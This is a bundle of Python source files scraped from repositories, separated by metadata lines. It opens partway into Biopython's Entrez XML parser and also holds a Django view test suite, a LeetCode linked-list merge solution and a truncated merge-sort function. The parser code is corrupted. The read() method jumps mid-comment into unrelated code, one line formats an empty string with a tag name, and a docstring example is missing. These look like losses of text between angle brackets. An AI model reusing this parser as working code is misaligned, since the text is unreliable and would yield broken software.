else:\n self.key = key\n self.attributes = attributes\n\n def __eq__(self, other):\n \"\"\"Define equality with other None objects.\"\"\"\n if other is None:\n return True\n elif other.__eq__(None):\n return True\n else:\n return False\n\n def __ne__(self, other):\n \"\"\"Define non-equality.\"\"\"\n if other is None:\n return False\n elif other.__eq__(None):\n return False\n else:\n return True\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n try:\n attributes = self.attributes\n except AttributeError:\n return \"NoneElement\"\n return \"NoneElement(attributes=%s)\" % repr(attributes)\n\n\nclass IntegerElement(int):\n \"\"\"NCBI Entrez XML element mapped to an integer.\"\"\"\n\n def __new__(cls, value, tag, attributes, key=None):\n \"\"\"Create an IntegerElement.\"\"\"\n self = int.__new__(cls, value)\n self.tag = tag\n if key is None:\n self.key = tag\n else:\n self.key = key\n self.attributes = attributes\n return self\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n text = int.__repr__(self)\n try:\n attributes = self.attributes\n except AttributeError:\n return text\n return \"IntegerElement(%s, attributes=%s)\" % (text, repr(attributes))\n\n\nclass StringElement(str):\n \"\"\"NCBI Entrez XML element mapped to a 
string.\"\"\"\n\n def __new__(cls, value, tag, attributes, key=None):\n \"\"\"Create a StringElement.\"\"\"\n self = str.__new__(cls, value)\n self.tag = tag\n if key is None:\n self.key = tag\n else:\n self.key = key\n self.attributes = attributes\n return self\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n text = str.__repr__(self)\n attributes = self.attributes\n if not attributes:\n return text\n return \"StringElement(%s, attributes=%s)\" % (text, repr(attributes))\n\n\nclass UnicodeElement(unicode):\n \"\"\"NCBI Entrez XML element mapped to a unicode string.\"\"\"\n\n def __new__(cls, value, tag, attributes, key=None):\n \"\"\"Create a UnicodeElement.\"\"\"\n self = unicode.__new__(cls, value)\n self.tag = tag\n if key is None:\n self.key = tag\n else:\n self.key = key\n self.attributes = attributes\n return self\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n text = unicode.__repr__(self)\n attributes = self.attributes\n if not attributes:\n return text\n return \"UnicodeElement(%s, attributes=%s)\" % (text, repr(attributes))\n\n\nclass ListElement(list):\n \"\"\"NCBI Entrez XML element mapped to a list.\"\"\"\n\n def __init__(self, tag, attributes, allowed_tags, key=None):\n \"\"\"Create a ListElement.\"\"\"\n self.tag = tag\n if key is None:\n self.key = tag\n else:\n self.key = key\n self.attributes = attributes\n self.allowed_tags = allowed_tags\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n text = list.__repr__(self)\n attributes = self.attributes\n if not attributes:\n return text\n return \"ListElement(%s, attributes=%s)\" % (text, repr(attributes))\n\n def store(self, value):\n \"\"\"Append an element to the list, checking tags.\"\"\"\n key = value.key\n if self.allowed_tags is not None and key not in self.allowed_tags:\n raise ValueError(\"Unexpected item '%s' in list\" % key)\n self.append(value)\n\n\nclass DictionaryElement(dict):\n \"\"\"NCBI Entrez XML element mapped to a dictionaray.\"\"\"\n\n def __init__(self, tag, attrs, allowed_tags, repeated_tags=None, key=None):\n \"\"\"Create a DictionaryElement.\"\"\"\n self.tag = tag\n if key is None:\n self.key = tag\n else:\n self.key = key\n self.attributes = attrs\n self.allowed_tags = allowed_tags\n self.repeated_tags = repeated_tags\n if repeated_tags:\n for key in repeated_tags:\n self[key] = []\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n text = dict.__repr__(self)\n attributes = self.attributes\n if not attributes:\n return text\n return \"DictElement(%s, attributes=%s)\" % (text, repr(attributes))\n\n def store(self, value):\n \"\"\"Add an entry to the dictionary, checking tags.\"\"\"\n key = value.key\n tag = value.tag\n if self.allowed_tags is not None and tag not in self.allowed_tags:\n raise ValueError(\"Unexpected item '%s' in dictionary\" % key)\n if self.repeated_tags and key in self.repeated_tags:\n self[key].append(value)\n else:\n self[key] = value\n\n\nclass NotXMLError(ValueError):\n \"\"\"Failed to parse file as XML.\"\"\"\n\n def __init__(self, message):\n \"\"\"Initialize the class.\"\"\"\n self.msg = message\n\n def __str__(self):\n \"\"\"Return a string summary of the exception.\"\"\"\n return (\n \"Failed to parse the XML data (%s). 
Please make sure that the input data \"\n \"are in XML format.\" % self.msg\n )\n\n\nclass CorruptedXMLError(ValueError):\n \"\"\"Corrupted XML.\"\"\"\n\n def __init__(self, message):\n \"\"\"Initialize the class.\"\"\"\n self.msg = message\n\n def __str__(self):\n \"\"\"Return a string summary of the exception.\"\"\"\n return (\n \"Failed to parse the XML data (%s). Please make sure that the input data \"\n \"are not corrupted.\" % self.msg\n )\n\n\nclass ValidationError(ValueError):\n \"\"\"XML tag found which was not defined in the DTD.\n\n Validating parsers raise this error if the parser finds a tag in the XML\n that is not defined in the DTD. Non-validating parsers do not raise this\n error. The Bio.Entrez.read and Bio.Entrez.parse functions use validating\n parsers by default (see those functions for more information).\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize the class.\"\"\"\n self.name = name\n\n def __str__(self):\n \"\"\"Return a string summary of the exception.\"\"\"\n return (\n \"Failed to find tag '%s' in the DTD. To skip all tags that \"\n \"are not represented in the DTD, please call Bio.Entrez.read \"\n \"or Bio.Entrez.parse with validate=False.\" % self.name\n )\n\n\nclass DataHandler(object):\n \"\"\"Data handler for parsing NCBI XML from Entrez.\"\"\"\n\n from Bio import Entrez\n\n global_dtd_dir = os.path.join(str(Entrez.__path__[0]), \"DTDs\")\n global_xsd_dir = os.path.join(str(Entrez.__path__[0]), \"XSDs\")\n local_dtd_dir = \"\"\n local_xsd_dir = \"\"\n\n del Entrez\n\n def __init__(self, validate, escape):\n \"\"\"Create a DataHandler object.\"\"\"\n self.dtd_urls = []\n self.element = None\n self.level = 0\n self.data = []\n self.attributes = None\n self.allowed_tags = None\n self.strings = {}\n self.lists = {}\n self.dictionaries = {}\n self.items = set()\n self.errors = set()\n self.validating = validate\n self.parser = expat.ParserCreate(namespace_separator=\" \")\n self.parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)\n self.parser.XmlDeclHandler = self.xmlDeclHandler\n self.schema_namespace = None\n self.namespace_level = Counter()\n self.namespace_prefix = {}\n self._directory = None\n if escape:\n self.characterDataHandler = self.characterDataHandlerEscape\n else:\n self.characterDataHandler = self.characterDataHandlerRaw\n\n def read(self, handle):\n \"\"\"Set up the parser and let it parse the XML results.\"\"\"\n # HACK: remove Bio._py3k handle conversion, since the Entrez XML parser\n # expects binary data\n if handle.__class__.__name__ == \"EvilHandleHack\":\n handle = handle._handle\n if handle.__class__.__name__ == \"TextIOWrapper\":\n handle = handle.buffer\n if hasattr(handle, \"closed\") and handle.closed:\n # Should avoid a possible Segmentation Fault, see:\n # http://bugs.python.org/issue4877\n raise IOError(\"Can't parse a closed handle\")\n if sys.version_info[0] >= 3:\n # Another nasty hack to cope with a unicode StringIO handle\n # since the Entrez XML parser expects binary data (bytes)\n from io import StringIO\n\n if isinstance(handle, StringIO):\n from Bio._py3k import _as_bytes\n\n handle = BytesIO(_as_bytes(handle.read()))\n try:\n self.parser.ParseFile(handle)\n except expat.ExpatError as e:\n if self.parser.StartElementHandler:\n # We saw the initial = 2:\n # Then the first record is finished, while the second record\n # is still a work in progress.\n record = records.pop(0)\n yield record\n\n # We have reached the end of the XML file\n self.parser = None\n if self.element is not None:\n # No more 
XML data, but there is still some unfinished business\n raise CorruptedXMLError(\"Premature end of XML stream\")\n\n # Send out the remaining records\n for record in records:\n yield record\n\n def xmlDeclHandler(self, version, encoding, standalone):\n \"\"\"Set XML handlers when an XML declaration is found.\"\"\"\n self.parser.StartElementHandler = self.startElementHandler\n self.parser.CharacterDataHandler = self.characterDataHandler\n self.parser.ExternalEntityRefHandler = self.externalEntityRefHandler\n self.parser.StartNamespaceDeclHandler = self.startNamespaceDeclHandler\n self.parser.EndNamespaceDeclHandler = self.endNamespaceDeclHandler\n\n def startNamespaceDeclHandler(self, prefix, uri):\n \"\"\"Handle start of an XML namespace declaration.\"\"\"\n if prefix == \"xsi\":\n # This is an xml schema\n self.schema_namespace = uri\n self.parser.StartElementHandler = self.schemaHandler\n else:\n # Note that the DTD for MathML specifies a default attribute\n # that declares the namespace for each MathML element. This means\n # that MathML element in the XML has an invisible MathML namespace\n # declaration that triggers a call to startNamespaceDeclHandler\n # and endNamespaceDeclHandler. Therefore we need to count how often\n # startNamespaceDeclHandler and endNamespaceDeclHandler were called\n # to find out their first and last invocation for each namespace.\n self.namespace_level[prefix] += 1\n self.namespace_prefix[uri] = prefix\n assert uri == \"http://www.w3.org/1998/Math/MathML\"\n assert prefix == \"mml\"\n\n def endNamespaceDeclHandler(self, prefix):\n \"\"\"Handle end of an XML namespace declaration.\"\"\"\n if prefix != \"xsi\":\n self.namespace_level[prefix] -= 1\n if self.namespace_level[prefix] == 0:\n for key, value in self.namespace_prefix.items():\n if value == prefix:\n break\n else:\n raise RuntimeError(\"Failed to find namespace prefix\")\n del self.namespace_prefix[key]\n\n def schemaHandler(self, name, attrs):\n \"\"\"Process the XML schema (before processing the element).\"\"\"\n key = \"%s noNamespaceSchemaLocation\" % self.schema_namespace\n schema = attrs[key]\n handle = self.open_xsd_file(os.path.basename(schema))\n # if there is no local xsd file grab the url and parse the file\n if not handle:\n handle = _urlopen(schema)\n text = handle.read()\n self.save_xsd_file(os.path.basename(schema), text)\n handle.close()\n self.parse_xsd(ET.fromstring(text))\n else:\n self.parse_xsd(ET.fromstring(handle.read()))\n handle.close()\n # continue handling the element\n self.startElementHandler(name, attrs)\n # reset the element handler\n self.parser.StartElementHandler = self.startElementHandler\n\n def startElementHandler(self, tag, attrs):\n \"\"\"Handle start of an XML element.\"\"\"\n if tag in self.items:\n assert tag == \"Item\"\n name = str(attrs[\"Name\"]) # convert from Unicode\n itemtype = str(attrs[\"Type\"]) # convert from Unicode\n del attrs[\"Type\"]\n if itemtype == \"Structure\":\n del attrs[\"Name\"]\n element = DictionaryElement(\n name, attrs, allowed_tags=None, repeated_tags=None\n )\n parent = self.element\n element.parent = parent\n # For consistency with lists below, store the element here\n if parent is None:\n self.record = element\n else:\n parent.store(element)\n self.element = element\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n elif name in (\"ArticleIds\", \"History\"):\n del attrs[\"Name\"]\n allowed_tags = None # allowed tags are unknown\n repeated_tags = 
frozenset([\"pubmed\", \"medline\"])\n element = DictionaryElement(\n tag,\n attrs,\n allowed_tags=allowed_tags,\n repeated_tags=repeated_tags,\n key=name,\n )\n parent = self.element\n element.parent = parent\n # For consistency with lists below, store the element here\n if parent is None:\n self.record = element\n else:\n parent.store(element)\n self.element = element\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n elif itemtype == \"List\":\n del attrs[\"Name\"]\n allowed_tags = None # allowed tags are unknown\n element = ListElement(tag, attrs, allowed_tags, name)\n parent = self.element\n element.parent = parent\n if self.element is None:\n # Set self.record here to let Entrez.parse iterate over it\n self.record = element\n else:\n parent.store(element)\n self.element = element\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n elif itemtype == \"Integer\":\n self.parser.EndElementHandler = self.endIntegerElementHandler\n self.parser.CharacterDataHandler = self.characterDataHandler\n self.attributes = attrs\n elif itemtype in (\"String\", \"Unknown\", \"Date\", \"Enumerator\"):\n assert self.attributes is None\n self.attributes = attrs\n self.parser.StartElementHandler = self.startRawElementHandler\n self.parser.EndElementHandler = self.endStringElementHandler\n self.parser.CharacterDataHandler = self.characterDataHandler\n else:\n raise ValueError(\"Unknown item type %s\" % name)\n elif tag in self.errors:\n self.parser.EndElementHandler = self.endErrorElementHandler\n self.parser.CharacterDataHandler = self.characterDataHandler\n elif tag in self.strings:\n self.parser.StartElementHandler = self.startRawElementHandler\n self.parser.EndElementHandler = self.endStringElementHandler\n self.parser.CharacterDataHandler = self.characterDataHandler\n assert self.allowed_tags is None\n self.allowed_tags = self.strings[tag]\n assert self.attributes is None\n self.attributes = attrs\n elif tag in self.dictionaries:\n allowed_tags, repeated_tags = self.dictionaries[tag]\n element = DictionaryElement(tag, attrs, allowed_tags, repeated_tags)\n parent = self.element\n element.parent = parent\n # For consistency with lists below, store the element here\n if parent is None:\n self.record = element\n else:\n parent.store(element)\n self.element = element\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n elif tag in self.lists:\n allowed_tags = self.lists[tag]\n element = ListElement(tag, attrs, allowed_tags)\n parent = self.element\n element.parent = parent\n if parent is None:\n # Set self.record here to let Entrez.parse iterate over it\n self.record = element\n else:\n parent.store(element)\n self.element = element\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n else:\n # Element not found in DTD\n if self.validating:\n raise ValidationError(tag)\n else:\n # this will not be stored in the record\n self.parser.StartElementHandler = self.startSkipElementHandler\n self.parser.EndElementHandler = self.endSkipElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n self.level = 1\n\n def startRawElementHandler(self, name, attrs):\n \"\"\"Handle start of an XML raw element.\"\"\"\n # check if the name is in a namespace\n prefix = None\n if self.namespace_prefix:\n try:\n uri, 
name = name.split()\n except ValueError:\n pass\n else:\n prefix = self.namespace_prefix[uri]\n if self.namespace_level[prefix] == 1:\n attrs = {\"xmlns\": uri}\n if prefix:\n key = \"%s:%s\" % (prefix, name)\n else:\n key = name\n # self.allowed_tags is ignored for now. Anyway we know what to do\n # with this tag.\n tag = \"<%s\" % name\n for key, value in attrs.items():\n tag += ' %s=\"%s\"' % (key, value)\n tag += \">\"\n self.data.append(tag)\n self.parser.EndElementHandler = self.endRawElementHandler\n self.level += 1\n\n def startSkipElementHandler(self, name, attrs):\n \"\"\"Handle start of an XML skip element.\"\"\"\n self.level += 1\n\n def endStringElementHandler(self, tag):\n \"\"\"Handle end of an XML string element.\"\"\"\n element = self.element\n if element is not None:\n self.parser.StartElementHandler = self.startElementHandler\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n value = \"\".join(self.data)\n self.data = []\n attributes = self.attributes\n self.attributes = None\n if tag in self.items:\n assert tag == \"Item\"\n key = str(attributes[\"Name\"]) # convert from Unicode\n del attributes[\"Name\"]\n else:\n key = tag\n # Convert Unicode strings to plain strings if possible\n try:\n value = StringElement(value, tag, attributes, key)\n except UnicodeEncodeError:\n value = UnicodeElement(value, tag, attributes, key)\n if element is None:\n self.record = element\n else:\n element.store(value)\n self.allowed_tags = None\n\n def endRawElementHandler(self, name):\n \"\"\"Handle start of an XML raw element.\"\"\"\n self.level -= 1\n if self.level == 0:\n self.parser.EndElementHandler = self.endStringElementHandler\n if self.namespace_prefix:\n uri, name = name.split()\n tag = \"\" % name\n self.data.append(tag)\n\n def endSkipElementHandler(self, name):\n \"\"\"Handle start of an XML skip element.\"\"\"\n self.level -= 1\n if self.level == 0:\n self.parser.StartElementHandler = self.startElementHandler\n self.parser.EndElementHandler = self.endElementHandler\n\n def endErrorElementHandler(self, name):\n \"\"\"Handle start of an XML error element.\"\"\"\n if self.data:\n # error found:\n value = \"\".join(self.data)\n raise RuntimeError(value)\n # no error found:\n if self.element is not None:\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n\n def endElementHandler(self, name):\n \"\"\"Handle end of an XML element.\"\"\"\n element = self.element\n self.element = element.parent\n del element.parent\n\n def endIntegerElementHandler(self, tag):\n \"\"\"Handle end of an XML integer element.\"\"\"\n attributes = self.attributes\n self.attributes = None\n assert tag == \"Item\"\n key = str(attributes[\"Name\"]) # convert from Unicode\n del attributes[\"Name\"]\n if self.data:\n value = int(\"\".join(self.data))\n self.data = []\n value = IntegerElement(value, tag, attributes, key)\n else:\n value = NoneElement(tag, attributes, key)\n element = self.element\n if element is None:\n self.record = value\n else:\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n if value is None:\n return\n element.store(value)\n\n def characterDataHandlerRaw(self, content):\n \"\"\"Handle character data as-is (raw).\"\"\"\n self.data.append(content)\n\n def characterDataHandlerEscape(self, content):\n \"\"\"Handle character data by encoding it.\"\"\"\n content = 
escape(content)\n self.data.append(content)\n\n def skipCharacterDataHandler(self, content):\n \"\"\"Handle character data by skipping it.\"\"\"\n return\n\n def parse_xsd(self, root):\n \"\"\"Parse an XSD file.\"\"\"\n prefix = \"{http://www.w3.org/2001/XMLSchema}\"\n for element in root:\n isSimpleContent = False\n attribute_keys = []\n keys = []\n multiple = []\n assert element.tag == prefix + \"element\"\n name = element.attrib[\"name\"]\n assert len(element) == 1\n complexType = element[0]\n assert complexType.tag == prefix + \"complexType\"\n for component in complexType:\n tag = component.tag\n if tag == prefix + \"attribute\":\n # we could distinguish by type; keeping string for now\n attribute_keys.append(component.attrib[\"name\"])\n elif tag == prefix + \"sequence\":\n maxOccurs = component.attrib.get(\"maxOccurs\", \"1\")\n for key in component:\n assert key.tag == prefix + \"element\"\n ref = key.attrib[\"ref\"]\n keys.append(ref)\n if maxOccurs != \"1\" or key.attrib.get(\"maxOccurs\", \"1\") != \"1\":\n multiple.append(ref)\n elif tag == prefix + \"simpleContent\":\n assert len(component) == 1\n extension = component[0]\n assert extension.tag == prefix + \"extension\"\n assert extension.attrib[\"base\"] == \"xs:string\"\n for attribute in extension:\n assert attribute.tag == prefix + \"attribute\"\n # we could distinguish by type; keeping string for now\n attribute_keys.append(attribute.attrib[\"name\"])\n isSimpleContent = True\n allowed_tags = frozenset(keys)\n if len(keys) == 1 and keys == multiple:\n assert not isSimpleContent\n self.lists[name] = allowed_tags\n elif len(keys) >= 1:\n assert not isSimpleContent\n repeated_tags = frozenset(multiple)\n self.dictionaries[name] = (allowed_tags, repeated_tags)\n else:\n self.strings[name] = allowed_tags\n\n def elementDecl(self, name, model):\n \"\"\"Call a call-back function for each element declaration in a DTD.\n\n This is used for each element declaration in a DTD like::\n\n \n\n The purpose of this function is to determine whether this element\n should be regarded as a string, integer, list, dictionary, structure,\n or error.\n \"\"\"\n if name.upper() == \"ERROR\":\n self.errors.add(name)\n return\n if name == \"Item\" and model == (\n expat.model.XML_CTYPE_MIXED,\n expat.model.XML_CQUANT_REP,\n None,\n ((expat.model.XML_CTYPE_NAME, expat.model.XML_CQUANT_NONE, \"Item\", ()),),\n ):\n # Special case. As far as I can tell, this only occurs in the\n # eSummary DTD.\n self.items.add(name)\n return\n # First, remove ignorable parentheses around declarations\n while (\n model[0] in (expat.model.XML_CTYPE_SEQ, expat.model.XML_CTYPE_CHOICE)\n and model[1] in (expat.model.XML_CQUANT_NONE, expat.model.XML_CQUANT_OPT)\n and len(model[3]) == 1\n ):\n model = model[3][0]\n # PCDATA declarations correspond to strings\n if model[0] in (expat.model.XML_CTYPE_MIXED, expat.model.XML_CTYPE_EMPTY):\n if model[1] == expat.model.XML_CQUANT_REP:\n children = model[3]\n allowed_tags = frozenset(child[2] for child in children)\n else:\n allowed_tags = frozenset()\n self.strings[name] = allowed_tags\n return\n # List-type elements\n if model[0] in (\n expat.model.XML_CTYPE_CHOICE,\n expat.model.XML_CTYPE_SEQ,\n ) and model[1] in (expat.model.XML_CQUANT_PLUS, expat.model.XML_CQUANT_REP):\n children = model[3]\n if model[0] == expat.model.XML_CTYPE_SEQ:\n assert len(children) == 1\n allowed_tags = frozenset(child[2] for child in children)\n self.lists[name] = allowed_tags\n return\n # This is the tricky case. 
Check which keys can occur multiple\n # times. If only one key is possible, and it can occur multiple\n # times, then this is a list. If more than one key is possible,\n # but none of them can occur multiple times, then this is a\n # dictionary. Otherwise, this is a structure.\n # In 'single' and 'multiple', we keep track which keys can occur\n # only once, and which can occur multiple times.\n single = []\n multiple = []\n # The 'count' function is called recursively to make sure all the\n # children in this model are counted. Error keys are ignored;\n # they raise an exception in Python.\n\n def count(model):\n quantifier, key, children = model[1:]\n if key is None:\n if quantifier in (\n expat.model.XML_CQUANT_PLUS,\n expat.model.XML_CQUANT_REP,\n ):\n for child in children:\n multiple.append(child[2])\n else:\n for child in children:\n count(child)\n elif key.upper() != \"ERROR\":\n if quantifier in (\n expat.model.XML_CQUANT_NONE,\n expat.model.XML_CQUANT_OPT,\n ):\n single.append(key)\n elif quantifier in (\n expat.model.XML_CQUANT_PLUS,\n expat.model.XML_CQUANT_REP,\n ):\n multiple.append(key)\n\n count(model)\n if len(single) == 0 and len(multiple) == 1:\n allowed_tags = frozenset(multiple)\n self.lists[name] = allowed_tags\n else:\n allowed_tags = frozenset(single + multiple)\n repeated_tags = frozenset(multiple)\n self.dictionaries[name] = (allowed_tags, repeated_tags)\n\n def open_dtd_file(self, filename):\n \"\"\"Open specified DTD file.\"\"\"\n self._initialize_directory()\n path = os.path.join(self.local_dtd_dir, filename)\n try:\n handle = open(path, \"rb\")\n except IOError:\n pass\n else:\n return handle\n path = os.path.join(self.global_dtd_dir, filename)\n try:\n handle = open(path, \"rb\")\n except IOError:\n pass\n else:\n return handle\n return None\n\n def open_xsd_file(self, filename):\n \"\"\"Open specified XSD file.\"\"\"\n self._initialize_directory()\n path = os.path.join(self.local_xsd_dir, filename)\n try:\n handle = open(path, \"rb\")\n except IOError:\n pass\n else:\n return handle\n path = os.path.join(self.global_xsd_dir, filename)\n try:\n handle = open(path, \"rb\")\n except IOError:\n pass\n else:\n return handle\n return None\n\n def save_dtd_file(self, filename, text):\n \"\"\"Save DTD file to cache.\"\"\"\n self._initialize_directory()\n path = os.path.join(self.local_dtd_dir, filename)\n try:\n handle = open(path, \"wb\")\n except IOError:\n warnings.warn(\"Failed to save %s at %s\" % (filename, path))\n else:\n handle.write(text)\n handle.close()\n\n def save_xsd_file(self, filename, text):\n \"\"\"Save XSD file to cache.\"\"\"\n self._initialize_directory()\n path = os.path.join(self.local_xsd_dir, filename)\n try:\n handle = open(path, \"wb\")\n except IOError:\n warnings.warn(\"Failed to save %s at %s\" % (filename, path))\n else:\n handle.write(text)\n handle.close()\n\n def externalEntityRefHandler(self, context, base, systemId, publicId):\n \"\"\"Handle external entity reference in order to cache DTD locally.\n\n The purpose of this function is to load the DTD locally, instead\n of downloading it from the URL specified in the XML. Using the local\n DTD results in much faster parsing. If the DTD is not found locally,\n we try to download it. 
If new DTDs become available from NCBI,\n putting them in Bio/Entrez/DTDs will allow the parser to see them.\n \"\"\"\n urlinfo = _urlparse(systemId)\n # Following attribute requires Python 2.5+\n # if urlinfo.scheme=='http':\n if urlinfo[0] in [\"http\", \"https\", \"ftp\"]:\n # Then this is an absolute path to the DTD.\n url = systemId\n elif urlinfo[0] == \"\":\n # Then this is a relative path to the DTD.\n # Look at the parent URL to find the full path.\n try:\n source = self.dtd_urls[-1]\n except IndexError:\n # Assume the default URL for DTDs if the top parent\n # does not contain an absolute path\n source = \"http://www.ncbi.nlm.nih.gov/dtd/\"\n else:\n source = os.path.dirname(source)\n # urls always have a forward slash, don't use os.path.join\n url = source.rstrip(\"/\") + \"/\" + systemId\n else:\n raise ValueError(\"Unexpected URL scheme %r\" % (urlinfo[0]))\n self.dtd_urls.append(url)\n # First, try to load the local version of the DTD file\n location, filename = os.path.split(systemId)\n handle = self.open_dtd_file(filename)\n if not handle:\n # DTD is not available as a local file. Try accessing it through\n # the internet instead.\n try:\n handle = _urlopen(url)\n except IOError:\n _raise_from(\n RuntimeError(\"Failed to access %s at %s\" % (filename, url)), None\n )\n text = handle.read()\n handle.close()\n self.save_dtd_file(filename, text)\n handle = BytesIO(text)\n\n parser = self.parser.ExternalEntityParserCreate(context)\n parser.ElementDeclHandler = self.elementDecl\n parser.ParseFile(handle)\n handle.close()\n self.dtd_urls.pop()\n return 1\n\n def _initialize_directory(self):\n \"\"\"Initialize the local DTD/XSD directories (PRIVATE).\n\n Added to allow for custom directory (cache) locations,\n for example when code is deployed on AWS Lambda.\n \"\"\"\n # If user hasn't set a custom cache location, initialize it.\n if self.directory is None:\n import platform\n\n if platform.system() == \"Windows\":\n self.directory = os.path.join(os.getenv(\"APPDATA\"), \"biopython\")\n else: # Unix/Linux/Mac\n home = os.path.expanduser(\"~\")\n self.directory = os.path.join(home, \".config\", \"biopython\")\n del home\n del platform\n # Create DTD local directory\n self.local_dtd_dir = os.path.join(self.directory, \"Bio\", \"Entrez\", \"DTDs\")\n try:\n os.makedirs(self.local_dtd_dir) # use exist_ok=True on Python >= 3.2\n except OSError as exception:\n # Check if local_dtd_dir already exists, and that it is a directory.\n # Trying os.makedirs first and then checking for os.path.isdir avoids\n # a race condition.\n if not os.path.isdir(self.local_dtd_dir):\n _raise_from(exception, None)\n # Create XSD local directory\n self.local_xsd_dir = os.path.join(self.directory, \"Bio\", \"Entrez\", \"XSDs\")\n try:\n os.makedirs(self.local_xsd_dir) # use exist_ok=True on Python >= 3.2\n except OSError as exception:\n if not os.path.isdir(self.local_xsd_dir):\n _raise_from(exception, None)\n\n @property\n def directory(self):\n \"\"\"Directory for caching XSD and DTD files.\"\"\"\n return self._directory\n\n @directory.setter\n def directory(self, directory):\n \"\"\"Allow user to set a custom directory, also triggering subdirectory initialization.\"\"\"\n self._directory = directory\n 
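        # setting the property re-creates the local DTD/XSD cache
        # directories under the new location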
self._initialize_directory()\n","repo_name":"aamirjankhan/BioinformaticsTool","sub_path":"BioinformaticsTool/venv/Lib/site-packages/Bio/Entrez/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":39574,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"663513636","text":"\"\"\"\nTests suite for the views of the licenses app.\n\"\"\"\n\nfrom django.test import TestCase, Client\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.test.utils import override_settings\n\nfrom ..models import License\n\n\n@override_settings(MEDIA_ROOT=settings.DEBUG_MEDIA_ROOT)\nclass LicenseViewsTestCase(TestCase):\n \"\"\"\n Tests suite for the views.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Create some fixtures for the tests.\n \"\"\"\n self.license1 = License.objects.create(name='Test 1',\n slug='test-1',\n description='Hello World!')\n self.license2 = License.objects.create(name='Test 2',\n slug='test-2',\n description='Hello World!')\n self.license3 = License.objects.create(name='Test 3',\n slug='test-3',\n description='Hello World!',\n logo='fixtures/beautifulfrog.jpg')\n\n def test_license_list_view_available(self):\n \"\"\"\n Test the availability of the \"license list\" view.\n \"\"\"\n client = Client()\n response = client.get(reverse('licenses:index'))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'licenses/license_list.html')\n self.assertIn('licenses', response.context)\n self.assertQuerysetEqual(response.context['licenses'], ['',\n '',\n ''])\n\n def test_license_detail_view_available(self):\n \"\"\"\n Test the availability of the \"license detail\" view.\n \"\"\"\n client = Client()\n response = client.get(self.license3.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'licenses/license_detail.html')\n self.assertIn('license', response.context)\n self.assertEqual(response.context['license'], self.license3)\n\n def test_license_detail_view_unavailable_with_unknown_slug(self):\n \"\"\"\n Test the unavailability of the \"license detail\" view with an unknown license's slug.\n \"\"\"\n client = Client()\n response = client.get(reverse('licenses:license_detail', kwargs={'slug': 'unknown-license'}))\n self.assertEqual(response.status_code, 404)\n self.assertTemplateUsed(response, '404.html')\n","repo_name":"TamiaLab/carnetdumaker","sub_path":"apps/licenses/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"8998432899","text":"\"\"\"\n21. Merge Two Sorted Lists\nMerge two sorted linked lists and return it as a new list. 
The new list should be made by splicing together the nodes of the first two lists.\n\nExample:\n\nInput: 1->2->4, 1->3->4\nOutput: 1->1->2->3->4->4\n\"\"\"\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n\n head = current = ListNode(0)\n\n while l1 or l2:\n\n if l1 and l2:\n\n if l1.val <= l2.val:\n current.next = l1\n l1 = l1.next\n else:\n current.next = l2\n l2 = l2.next\n current = current.next\n\n else:\n if l1:\n current.next = l1\n l1 = None\n else:\n current.next = l2\n l2 = None\n\n return head.next\n\nif __name__ == '__main__':\n node1_0 = ListNode(0)\n node1_1 = ListNode(1)\n node1_2 = ListNode(2)\n\n node2_0 = ListNode(0)\n node2_1 = ListNode(1)\n\n node1_0.next = node1_1\n node1_1.next = node1_2\n node2_0.next = node2_1\n\n solution = Solution()\n head = solution.mergeTwoLists(node1_0, node2_0)","repo_name":"mungerism/LeetcodePython","sub_path":"21. Merge Two Sorted Lists.py","file_name":"21. Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"30947014548","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/3/30 20:23\n# @Author : lihanhan\n# @Email : demo1li@163.com\n# @File : 合并2个有序列表.py\ndef merge(items1, items2, comp=lambda x, y: x < y):\n \"\"\"合并(将两个有序的列表合并成一个有序的列表)\"\"\"\n items = []\n index1, index2 = 0, 0\n while index1 < len(items1) and index2 < len(items2):\n if comp(items1[index1], items2[index2]):\n items.append(items1[index1])\n index1 += 1\n else:\n items.append(items2[index2])\n index2 += 1\n items += items1[index1:]\n items += items2[index2:]\n return items\n\n\ndef merge_sort(items, comp=lambda x, y: x < y):\n return 